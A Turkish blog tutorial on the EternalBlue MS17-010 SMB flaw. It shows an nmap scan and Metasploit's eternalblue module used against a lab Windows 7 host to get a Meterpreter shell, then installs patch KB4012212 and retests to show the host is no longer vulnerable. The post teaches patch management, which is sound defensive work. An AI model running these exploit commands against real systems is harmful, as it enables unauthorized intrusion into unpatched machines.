Eternal Blue MS-17-010 Zafiyeti bu yazımızın konusu olacaktır. Bu zafiyet nedir ve nasıl sömürülmektedir. En son olarak mitigation olarak ne yapılmaktadır, anlatmış olacağız.
2017 yılında Microsoft tarafından yayınlanan bir güvenlik açığıdır. Bu açık SMB protokolünün işlendiği bölümün eksikliğinden kaynaklanır ve sistemlere yetkisiz erişim sunmaktadır. SMB protokolü üzerinden dll injection yaparak hedefe sızılmaktadır. Bu açıklıktan etkilenecek sistemler Microsoft makalesinde belirtilmiştir.
Öncellikle test ortamında patch geçilmemiş bir Windows 7 sunucusuna bu atağı deneyelim.
Nmap taramasında 445 portunda vulnerability testi yapalım. Client’ın üzerindeki eksiklikleri çıkaralım. Aşağıdaki fotoğrafta’da görüldüğü gibi MS17-010 Vulnerable durumda.
nmap -Pn -p445 --open --script vuln "IP Adresi"
![Eternal Blue MS-17-010 Zafiyeti](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-56.png)
Sonrasında MetaSpolit çalıştıralım.
msfconsole
![](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-57.png)
Eternal’a göre search işlemi yapalım ve exploit bulalım.
search eternal
![Search Eternal](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-58-1024x209.png)
Exploit’i bulduk.
use exploit/windows/smb/ms17_010_eternalblue
options
![](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-59-1024x400.png)
Sonrasında Option’dan target belirleyelim ve exploit başlatalım.
set RHOST 10.10.10.63
set target 0
![Eternal Blue MS-17-010 Zafiyeti set target](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-60.png)
Hemen sonrasında Exploit başlatalım.
exploit
![Eternal Blue MS-17-010 Zafiyeti Meterpreter](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-61.png)
Meterpreter üzerinde shell açabildik. Şimdi makinede shell çalıştıralım. Makinenin C diskini listeledik, sysinfo ile bilgilerini alabildik. Daha yapılabilecek çok fazla durum mevcuttur.
![](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-62.png)
Eternal Blue MS-17-010 Mitigation
İlk olarak Microsoft tarafından yayınlanan MS-17-010 zafiyetine ait güncelleme yüklenmelidir. Windows 7 için KB4012212 güncellemesini test ortamında geçip tekrardan test edeceğiz.
![Install MS-17-010 Update](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-63.png)
Tekrardan yukarıdaki işlemleri denediğimizde ;
The Target is not vulnerable ifaedini görmekteyiz.
![Eternal Blue MS-17-010 Zafiyeti Mitigation](https://koraycankaraduman.com/wp-content/uploads/2024/05/image-64.png)
Sonuç olarak patch yönetimini önemi bu yazımızda test etmiş olduk.Sistemleri up-to-date tutmak bu konuda çok kritiktir. Eternal Blue MS-17-010 Zafiyeti ne olduğunu ve bu zafiyetin nasıl giderildiğini göstermiş olduk. Diğer yazılarımı aşağıdaki kategorilerden takip edebilirsiniz.